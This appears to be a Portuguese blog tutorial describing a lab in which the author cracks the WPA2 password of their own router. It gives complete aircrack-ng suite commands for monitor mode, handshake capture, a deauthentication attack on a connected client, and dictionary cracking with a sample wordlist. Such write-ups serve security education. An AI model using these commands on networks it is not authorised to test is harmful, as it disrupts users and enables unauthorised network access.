O que é virtualização ?
O que é uma infraestrutura , onde começou , definição e suas vantagens.
Conhecimento foi feito para ser partilhado e não guardado.
Nesse laboratório vou configurar um roteador com WPA2 e em seguida vamos quebrar a senha dele usando o arsenal do aircrack-ng.
Para simular uma rede vamos ter outro dispositivo além da maquina de ataque.
Podemos usar um celular para simular um usuário usando a rede.
Na nossa maquina responsável pelo ataque vamos precisar de.
Nesse caso eu estou usando o Debian Stretch.
sudo apt-get install aircrack-ng
sudo apt-get install net-tools
Podemos usar o ifconfig para nos auxiliar no reconhecimento do nosso adaptador de rede.
Precisamos de permissão de super usuário para usar o ifconfig , para isso usamos o sudo.
sudo ifconfig
Nesse caso a minha está com o nome wlp2s0.
Sabendo isso podemos ir para o próximo passo.
Podemos usar tambem o iwconfig(iw - ferramenta para configuração de dispositivos sem fio no Linux).
sudo iwconfig
Antes de iniciar o modo monitor vamos checar os processos a fim de interromper possíveis conflitos.
airmon-ng check kill
Vamos iniciar o modo monitor
airmon-ng start wlp2s0
Podemos verificar nosso adaptador novamente usando o ifconfig.
sudo ifconfig
Agora apareceu a rede wlp2s0mon , vamos precisar disso para o próximo passo.
Podemos iniciar o modo monitor da seguinte forma.
sudo airodump-ng wlp2s0mon
Assim que for dado o comando ele vai começar buscar por redes , podemos ver que vai ser encontrado a rede emporiolife.
Essa rede é a nossa rede de testes e nosso laboratório.
Em outras aulas vamos usar esse domínios para realizar alguns ataques , já que esse domínio é de minha propriedade e todos os laboratórios serão realizados de forma controlada.
Podemos ver a rede emporiolife , precisamos prestar atenção em alguns pontos.
São eles
Agora que já sabemos isso podemos cancelar apertando um Ctrl+c.
Agora que já sabemos a nossa rede alvo vamos filtrar ela e salvar todo o dump em um arquivo.
Nesse exemplo vou chamar o arquivo de emporiolife.
Precisamos ver
airodump-ng -c 8 --bssid 18:D6:C7:D2:D3:CC -w emporiolife wlp2s0mon
Agora tudo o que precisamos é um cliente se conectar na rede para pegar o handshake , agora é a hora que o segundo dispositivo entra em ação , esse dispositivo que falamos no começo para simular um usuário real na rede.
Só que não temos tempo para esperar até ele se conectar , para isso vamos derrubar ele.
Agora que o airodump-ng ta rodando e salvando tudo em um arquivo vamos precisar pegar o handshake.
Podemos forçar isso da seguinte forma.
O aireplay-ng é uma ferramenta muito interessante , ela pode nos auxiliar em diversas coisas.
Podemos ver as opções usando
sudo aireplay-ng --help
Vamos usar a opção –deauth , vamos usar tambem o contador count. (Vamos ver mais sobre ela em outro tutorial.)
Vamos montar nosso ataque para desautenticação , vamos usar
sudo aireplay-ng --deauth 5 -a 18:D6:C7:D2:D3:CC -c AC:D0:74:20:CB:20 wlp2s0mon
Após realizar o ataque de dasautenticação podemos ver o airodump-ng e checar se apareceu no canto superior direito a mensagem. WPA handshake: 18:D6:C7:D2:D3:CC.
Veja na imagem a baixo
Podemos fechar o airodump-ng.
Vamos listar os arquivos gerados , podemos dar um ls para listar o diretório.
Veja a imagem a baixo.
Podemos ver os arquivos com o nome emporiolife.
Vamos agora precisar de uma wordlist , baseada nessa wordlist que a senha será quebrada e se a senha não estiver nessa wordlist ela não sera quebrada.
Para realizar esse teste podemos criar uma wordlist para testes , mais poderíamos usar outros dicionários de senhas.
Vou criar o dicionario chamado alvo-emporiolife.txt com possíveis senhas do alvo.
emporio
life
emporiolife
emporiolifewifi
wificlientes
wififuncionarios
wifi2018
wifipassword
emporiolife@123
emporiolife2018
emporiolife@2018
lifeemporio
senha2018
12345senha
Futuramente vou explicar como criar wordlists personalizadas usando o crunch.
Vamos precisar do arquivo .cap que conseguimos anteriormente e do aircrack-ng.
Vamos usar o
Como a wordlist e o arquivo .cap estão no mesmo diretório eu não precisei passar o caminho inteiro.
sudo aircrack-ng emporiolife-01.cap -w alvo-emporiolife.txt